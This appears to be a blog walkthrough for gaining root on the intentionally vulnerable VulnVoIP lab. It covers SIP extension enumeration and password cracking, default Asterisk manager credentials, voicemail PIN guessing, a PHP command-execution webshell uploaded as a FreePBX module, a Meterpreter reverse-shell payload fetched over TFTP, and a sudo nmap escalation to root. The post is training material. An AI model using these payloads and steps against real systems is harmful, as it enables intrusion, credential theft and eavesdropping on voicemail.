As promised here we shall discuss a couple of ways to get root on VulnVoIP with some enumeration ‘fun’ in-between!
Assuming you’ve located the IP address, you can run a port scan and
will find the following services listening (shortened for easy
reference):
- 22/tcp open
- 53/tcp open domain
- 80/tcp open http
- 111/tcp open rpcbind
- 967/tcp open
- 3306/tcp open mysql
- 4445/tcp open
- 5038/tcp open asterisk
VoIP User Enumeration
In this demonstration I’m using
SIPVicious to enumerate the SIP device/users and to help crack extension passwords.
The first thing to do is enumerate the end device. To do so we can use the command
./svmap.py –fingerprint 192.168.237.148
The next step is to locate valid SIP extensions. The initial command I used was
./svwar.py -D 192.168.237.148
As you can see no valid extensions are returned.
It’s possible to specify the method used in the request. In this
particular instance the INVITE request brings back valid responses
./svwar.py -D -m INVITE 192.168.237.148
If all went well you should find that 6 extensions exist. The –D
option used in the previous command just searches for default
extensions, so it’s generally best to use a custom range. I also found
that if I specified the extensions to scan, i.e. –e100-3000, only the
lower extensions were found, hence it may be best to split up long
scans.
Now that we’ve located extensions we
really want to crack the associated passwords. Again SIPVicious can be
used to perform this attack by using a command such as
./svcrack.py -u2000 -d passwords.txt 192.168.237.148
You might find that some extensions are easy to crack, others are a
bit more testing! In this particular case, luckily, we have another
unusual method of obtaining extension passwords.
Referring back to the port scan you can see that TCP port 5038
(Asterisk Call Manager) is open and available to external probes! If you
performed a vulnerability scan this may have shown up stating that
default credentials are in place.
It is possible to connect to the service using the telnet protocol on
port 5038 with the default username admin and password amp111.
Using the command action with the actual command of
sip show users it is possible to pull out a complete list of users, shown below:
The acm interface can also be used to locate voicemail users (useful for the next exercise!)
Note the ‘interesting’ information highlighted in the above image.
A thorough list of acm commands can be found
here
Further Exploitation
As we’ve located a single user with voicemail capability, and we have
the extension password, it is possible to use a soft-phone to log in
with the credentials and attempt to gain access to the users voicemail
inbox. For this particular example I’m using
X-Lite.
Referencing Asterisk documentation it’s possible to see that
*97
can be used to obtain voicemail. As we don’t know the voicemail
password we’re going to have to bruteforce the manual way! Hint 0000 may
get you in… In case you’re still struggling the voicemail goes along
the lines of the following:
‘…Hey Mark, I think the support web
access account has been compromised. I have changed the password to
securesupport123 all one word and lowercase. You can log on at
the usual address. See you in the morning…’
After listening to the voicemail you should now have the username and
password for the support account. To test these out navigate to the
HTTP interface and enter the credentials support/securesupport123
Upon login you’ll be presented with the main administrative interface. A
key piece of info is found in the FreePBX version details (research for
vulnerabilities).
One particular vulnerability of interest can be found
here, of which an extract follows:
- Create a directory such as: webshell
- Create a PHP file webshell, i.e. webshell.php
- Example.: <? if($_GET['cmd']) { system($_GET['cmd']); }?>
- Put this file into the webshell directory and create a tarball.
- This compressed file name needs to follow the given rule, i.e. name-version.tgz.
- The following command can be used to compress: tar -czvf webshell-1.0.tgz webshell/.
- Upload via the FreePBX modules interface
Using the webshell to perform a basic command (to ensure all is working as expected).
I used msfpayload to create a reverse shell for ease of access.
msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.237.129 LPORT=4448 X > /root/vulnvoip/rev_shell.
The handler (
exploit/multi/handler) was used to listen and wait for incoming connections.
TFTP can be used to upload the binary to the host using the PHP webshell as previously created, by using the command
tftp *HOST_IP*-c get rev_shell.
Permissions of the uploaded file will need to be altered, i.e.
chmod 777 rev_shell - not a great idea to use lax permissions like these in real life
Upon gaining access via the Meterpreter shell it makes things easier (continue reading)…
Local Privilege Escalation
The usual tips and tricks work here. A little surprise is hidden in
the sudoers file. Firstly we’ll need to locate the current user
by issuing the command
id which will show the user is asterisk. Issuing the command
sudo -l will then identify the commands that asterisk can run as root.
The user asterisk can surprisingly run nmap as root! There’s a little trick here…
We’ve got root!
Exploitation – The Easy Way!
The following was covered in detail by Offensive Security and the write-up can be found
here.
The version of FreePBX in use is vulnerable to an arbitrary remote code execution issue. Further details can be found at
exploitDB and
Securityfocus.
From the reported details it is possible to see that a Metasploit module exists, this being
exploit/unix/http/freepbx_callmenum.
Set the relevant options (note, the extension we use for this either
has to go to voicemail or the call needs to be answered). For this
exploit we’re going to use the support extension. We’ll assume that we
haven’t yet cracked user credentials to any extensions and, this being
the only one with voicemail, leaves us with just one choice.
Exploit!
We have root shell. Now how cool and easy was that!
There are a few more funky things we can do with VulnVoIP, such as
SIP spoofing. However we’ll cover that in a separate post and in the
meantime have some fun!
